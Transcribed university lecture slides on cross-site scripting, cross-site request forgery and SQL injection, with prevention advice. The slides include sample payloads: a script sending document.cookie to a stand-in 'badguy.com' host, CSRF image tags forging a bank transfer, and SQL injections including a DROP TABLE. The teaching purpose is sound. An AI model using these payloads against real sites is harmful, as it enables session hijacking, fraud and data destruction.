CSCD 303 Essential Computer Security Fall 2018

Similar documents
CSCD 303 Essential Computer Security Fall 2017

Application vulnerabilities and defences

Information Security CS 526 Topic 11

Web Application Security. Philippe Bogaerts

Information Security CS 526 Topic 8

Common Websites Security Issues. Ziv Perry

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Web basics: HTTP cookies

CIS 4360 Secure Computer Systems XSS

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Web basics: HTTP cookies

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Your Turn to Hack the OWASP Top 10!

WEB SECURITY: XSS & CSRF

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Copyright

CSCE 813 Internet Security Case Study II: XSS

Computer Security CS 426 Lecture 41

CS 142 Winter Session Management. Dan Boneh

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Web Security, Part 2

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Preparing for the Cross Site Request Forgery Defense

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

C1: Define Security Requirements

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

CS 161 Computer Security

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

P2_L12 Web Security Page 1

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Welcome to the OWASP TOP 10

Client Side Injection on Web Applications

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

NET 311 INFORMATION SECURITY

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

WHY CSRF WORKS. Implicit authentication by Web browsers

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

Web Application Security

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

COMP9321 Web Application Engineering

Hacking Intranet Websites from the Outside

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Some Facts Web 2.0/Ajax Security

SECURITY TESTING. Towards a safer web world

Sichere Software vom Java-Entwickler

The PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference


Solutions Business Manager Web Application Security Assessment

Content Security Policy

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

7.2.4 on Media content; on XSS) sws2 1

Web Security IV: Cross-Site Attacks

Robust Defenses for Cross-Site Request Forgery Review

Security. CSC309 TA: Sukwon Oh

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Web Application Vulnerabilities: OWASP Top 10 Revisited

Reflected XSS Cross-Site Request Forgery Other Attacks

Web Application Penetration Testing

CS526: Information security

Cross Site Request Forgery

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

Cross-Site Request Forgery

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

Web Security Computer Security Peter Reiher December 9, 2014

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

Progress Exchange June, Phoenix, AZ, USA 1

CSWAE Certified Secure Web Application Engineer

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Web Security: XSS; Sessions

Security Course. WebGoat Lab sessions

Web Security: Web Application Security [continued]

Web Security II. Slides from M. Hicks, University of Maryland

Computer and Network Security

Robust Defenses for Cross-Site Request Forgery

ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation

Preventing Image based Cross Site Request Forgery Attacks

OWASP Top Dave Wichers OWASP Top 10 Project Lead OWASP Board Member COO/Cofounder, Aspect Security

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Lecture Notes on Safety and Information Flow on the Web: II

Web Security, Summer Term 2012

Web Security, Summer Term 2012

THREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

Ruby on Rails Secure Coding Recommendations

Transcription:

CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides

Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server system Inject content on web pages that trick users or Inject content on web pages that trick web servers Result is stolen resources or destruction of information 2

Web Based Attacks 3

Application Layer APPLICATION ATTACK Finance Accounts Transactions Administration E-Commerce Knowledge Mgmt Communication Custom Code Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing Application Layer Attacker sends attacks inside valid HTTP requests Your code is tricked into doing something it should not Security requires software development expertise App Server Web Server Network Layer Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests Network Layer Firewall Hardened OS Firewall Insider 4

Types of Web Attacks What kinds of Web attacks are popular? Inadequate validation of user input Named Attacks Below Cross site scripting, XSS Cross site request forgery, CSRF SQL Injection 5

Cross-site Scripting (XSS) Cross-site scripting (XSS) computer security vulnerability found in web applications Allows code injection by malicious web users into web pages viewed by other users Examples of such code include HTML code and clientside scripts An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as Same origin policy for scripts As of 2017 cross-site scripting among the top 10 web site problems https://www.owasp.org/index.php/category:owasp_top_ten_2017_project 6

Same Origin Policy Intent is to let users visit untrusted web sites without those web sites interfering with user's session with honest web sites Same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin Two pages have same origin if protocol, port (if one is specified), and host are the same for both pages http://www.w3.org/security/wiki/same_origin_policy URL Outcome Reason http://store.company.com/dir2/other.html Success http://store.company.com/dir/inner/another.html Success https://store.company.com/secure.html Failure Different protocol http://store.company.com:81/dir/etc.html Failure Different port http://news.company.com/dir/other.html Failure Different host 7

Example Websites XSS d A hacker was able to insert JavaScript code into the Obama community blog section JavaScript would redirect users to Hillary Clinton website http://www.youtube.com/watch?v=pas7kcgjkew http://www.crn.com/news/security/207401353/ obama-website-hacked-users-redirected-to-clinton-campaign.htm Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs List of websites XSS are here http://www.xssed.com/archive Example of XSS Attack http://www.acunetix.com/websitesecurity/xss/ 8

Cross Site Scripting (XSS) Recall Scripts embedded in web pages run in browsers Scripts can access cookies Get private information Manipulate page objects Controls what users see Scripts controlled by same-origin policy How could XSS occur? Web applications often take user inputs and use them as part of webpage 9 9

Cross-Site Scripting (XSS) Attacks

XSS Example User input is echoed into HTML response Example: Search field http://victim.com/search.php? term = apple search.php responds with this page: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> Is this exploitable? 11

XSS Example Attacker s Bad input Problem: No validation of input term Consider this link: http://victim.com/search.php? term = <script> window.open( http://badguy.com?cookie = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> Browser executes script: Sends badguy.com cookie for victim.com 12

More Details of XSS Why would user click on such a link? Phishing email in webmail client (e.g. gmail). Link in doubleclick banner ad many, many ways to fool user into clicking What if badguy.com gets cookie for victim.com? Cookie can include session authentication for victim.com Or other data intended only for victim.com Violates same origin policy Lets see another picture of this more details https://excess-xss.com/ 13

Consequences of XSS Attacks XSS can cause problems for end user that range in from annoyance to complete account compromise. Most severe XSS attacks involve disclosure of the user s session cookie, allowing an attacker to hijack the user s session and take over the account. Other results include disclosure of end user files, installation of Trojan horse programs, redirect user to some other page or site, or modify presentation of content 14

XSS Examples More examples for your viewing pleasure Good link below with many cut and paste opportunities to try this out A complete How to for XSS: https://www.owasp.org/index.php/cross-site_scripting_%28xss%29 15

Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities <script> becomes <script> but still displayed as <script> Methods: OWASP ESAPI Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/ XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 16

Preventing XSS Security Expert Coding Recommendations http://www.jtmelton.com/tag/cross-site-scripting/.net: use the Microsoft Anti-XSS Library http://msdn.microsoft.com/en-us/security/aa973814.aspx 17

XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default Will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust Must first enable Javascript in Firefox http://noscript.net/features 18

Cross Site Request Forgery CSRF 19

What is Cross Site Request Forgery? Define it Cross-Site Request Forgery (CSRF) is an attack that tricks victim into loading a page that contains a malicious request It is malicious in that it inherits identity and privileges of victim to perform an undesired function on victim's behalf Change victim's e-mail address, Change home address, or Change password, or purchase something 20

1 Attacker sets the trap on some website on the Internet (or simply via an e-mail) Application with CSRF vulnerability Hidden <img> tag contains attack against vulnerable site Accounts Finance Administration Transactions E-Commerce Knowledge Mgmt Communication Bus. Functions 2 While logged into vulnerable site,victim views attacker site <img> tag loaded by browser sends GET request (including credentials) to vulnerable site 3 Vulnerable site sees legitimate request from victim and performs the action requested 21 Custom Code

Cross Site Request Forgery (CSRF) Cross Site Request Forgery, also XSRF or Cross Site Reference Forgery Works by exploiting trust of site for user In the case of XSS, the user is victim In the case of CSRF, the user is an accomplice Example: http://site/stocks?buy=100&stock=ebay Allows specific actions to be performed when requested If a user is logged into site and an attacker tricks their browser into making a request to one of these task urls, then task is performed for logged in user but the user didn t intend to do it 22

Dangers of CSRF Most of the functionality allowed by website can be performed by an attacker utilizing CSRF What does this mean for victims? This could include Posting content to a message board, Subscribing to an online newsletter, Performing stock trades, using a shopping cart, or Even sending an e-card 23

CSRF More Details Most popular ways to execute CSRF attacks Using HTML image tag, or JavaScript image object An attacker will embed these into an email or website so when user loads page or email, they perform a web request to any URL of attackers liking Examples follow 24

CSRF Code Examples HTML Methods IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> JavaScript Methods 'Image' Object <script> var foo = new Image(); foo.src = "http://host/?command"; </script> 25

CSRF Example Detailed Say, online banking site performs a transfer of funds action by calling a URL such as: http://bigsafebank.com/ transfer.do?acct=attacker&amount=1000 This URL will transfer $1000 from a victim s account into the attacker s account if the victim is logged into their account within BigSafeBank website 26

CSRF Example Detailed Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML email with a tag such as: <img src="http://bigsafebank.com/transfer.do? acct=attacker&amount=1000" width="1" height="1" border="0"> When a victim views this HTML email, Will see an error indicating that image could not be loaded, But browser still submits transfer request to bigsafebank.com without requiring any further interaction from the user 27

CSRF Example Detailed Crazy part is Even though the image was rendered unsuccessfully, Using <img> tag, an automatic http request was made that contained the victim's credentials, ie. Session Cookie Allowing server to perform the malicious action 28

CSRF Why Does it Happen A web application's vulnerability to CSRF is due to the following conditions: Use of certain HTML tags will result in automatic HTTP Request execution Our browsers have no way of telling if a resource referenced by an <img> tag is a legitimate image Loading of an image will happen regardless of where that image is located 29

CSRF Why Does it Happen More reasons why... Code within web application performs security sensitive operations in response to requests without validation of user GET requests are especially vulnerable to this type of attack, but POST requests are not immune 30

Fixing CSRF with CSRF Guard http://www.owasp.org/index.php/how_csrfguard_works The Open Web Application Security Project (OWASP) Has tool, CSRF Guard, implements session-token to thwart CSRF attacks When user first visits site, application will generate and store a session specific token This session specific token is then placed in each form and link of HTML response, ensuring that this value will be submitted with next request For each subsequent request, application must verify existence of unique token parameter and compare its value to that of value stored in user's session 31

SQL Injection 32

SQL Injection Very Common vulnerability (~71 attacks/hour ) Exploits Web Databases Poorly validate user input for SQL string literal escape characters, e.g., ' Do not have strongly screened user input Example escape characters "SELECT * FROM users WHERE name = '" + username + "';" If username is set to ' or '1'='1, the resulting SQL is SELECT * FROM users WHERE name = '' OR '1'='1'; This evaluates to SELECT * FROM users displays all users 33

SQL Injection Example Select statement "SELECT * FROM userinfo WHERE id = " + a_variable + ";" If programmer doesn t check a_variable is a number, attacker can set a_variable = 1; DROP TABLE users SQL evaluates to SELECT * FROM userinfo WHERE id=1;drop TABLE users; Result of this query? Users table is deleted 34

Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS 35

Preventing SQL injection Use Prepared Statements $id=1234 select * from accounts where id = + $id Next one is safer More exact select * from accounts where id =1234 Validate input Strong typing If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters ticks, --, semi-colon, brackets OWASP Cheat sheet https://www.owasp.org/index.php/sql_injection_prevention_cheat_sheet 36

Summary Experts suggest, Internet Security model is completely flawed Made worse by Web 2.0 As developers we can at least ensure our code is not broken As users we have far less control Browser security!!!! 37

References CSRF Links CGI FAQ on Cross Site Request Forgery (CSRF) http://www.cgisecurity.com/articles/csrf-faq.shtml Art of Software Security Assessment Same Origin http://taossa.com/index.php/2007/02/08/same-origin-policy/ OWASP CSRF Site http://www.owasp.org/index.php/csrf MSDN Article on CSRF Explained http://msdn.microsoft.com/en-us/testing/cc664492.aspx Wikipedia http://en.wikipedia.org/wiki/crosssite_request_forgery 38

References XSS http://www.cgisecurity.com/articles/xss-faq.shtml http://sandsprite.com/sleuth/papers/realworld_xss_1.html http://www.cgisecurity.com/articles/xss-faq.shtml http://msdn.microsoft.com/en-us/testing/cc664492.aspx http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ 39

References SQL Injection Cheat Sheet http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ SQL Prevention http://www.marcofolio.net/features/how_you_can_prevent_an_sql_inj ection.html SQL Attacks from UnixWiz http://www.unixwiz.net/techtips/sql-injection.html OWASP SQL Injection https://www.owasp.org/index.php/sql_injection_prevention_cheat_ Sheet 40

End Lab this week, XSS and CSRF and SQL Injection 41

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback